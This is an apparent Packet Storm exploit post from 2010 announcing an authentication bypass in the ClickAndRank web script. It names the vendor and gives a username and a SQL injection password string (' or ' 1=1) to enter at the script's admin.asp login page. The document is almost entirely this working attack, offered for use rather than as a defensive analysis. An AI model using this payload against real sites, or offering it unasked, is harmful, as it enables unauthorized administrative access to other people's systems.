ClickAndRank Script SQL Injection

2010-07-18T00:00:00
ID PACKETSTORM:91937
Type packetstorm
Reporter WaLiD
Modified 2010-07-18T00:00:00

Description

                                        
                                            `# Exploit Title: ClickAndRank Script Authentication Bypass  
# Date: [18/07/2010]  
# Author: [walid]  
# Software Link: [null]  
# Version: [null]  
# Tested on: [Windows]  
# CVE: [null]  
  
* Found By: WaLiD  
* E-mail: Rezultas[at]Gmail[Dot]com  
* GreeTZ: [Amine]/[v4-team.com]/[Madjix]  
  
---------------------------------------------------------  
Vendor: http://www.icash.ch/index.html?ClickAndRank/details.asp  
---------------------------------------------------------  
  
Exploit Auth Bypass:  
  
login: walid  
passw: ' or ' 1=1  
  
----------------------------------------------------------  
  
-[!]  
  
Demo :  
http://<site>/index.html?ClickAndRank/admin.asp  
  
----------------------------------------------------------  
  
`